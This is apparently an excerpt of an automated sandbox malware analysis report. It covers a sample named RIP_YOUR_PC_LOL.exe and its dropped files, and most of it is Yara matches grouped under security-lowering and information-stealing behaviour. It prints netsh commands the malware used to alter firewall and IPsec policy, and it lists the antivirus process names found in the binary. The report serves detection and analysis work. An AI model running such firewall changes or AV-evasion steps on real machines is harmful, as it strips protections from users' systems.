                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeQueries volume information: C:\Users\user\AppData\Roaming\test.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeCode function: 7_2_0040AE40 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_0040AE40

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: Yara match; File source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.0.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.0.test.exe.da0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.0.test.exe.da0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.3.RIP_YOUR_PC_LOL.exe.59c8085.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.3479694.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.0.test.exe.da0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: test.exe PID: 6236, type: MEMORYSTR
                    Source: Yara match; File source: C:\Users\user\AppData\Roaming\test.exe, type: DROPPED
                    Source: Yara match; File source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Roaming\22.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add policy name=Block
                    Source: C:\Users\user\AppData\Roaming\mediaget.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: acs.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: vsserv.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: avcenter.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: kxetray.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: avp.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: cfp.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: KSafeTray.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: rtvscan.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 360tray.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: ashDisp.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: TMBMSRV.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: avgwdsvc.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: AYAgent.aye
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: QUHLPSVC.EXE
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: RavMonD.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Mcshield.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: K7TSecurity.exe

                    Stealing of Sensitive Information

                    Source: Yara match; File source: dump.pcap, type: PCAP
                    Source: Yara match; File source: 00000014.00000003.641078460.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara match; File source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f6fa72.9.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.2.Pluto Panel.exe.4698e10.8.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f6fa72.13.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f6fa72.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f6fa72.7.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.2.Pluto Panel.exe.4698e10.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f6fa72.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Pluto Panel.exe PID: 4236, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPED
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
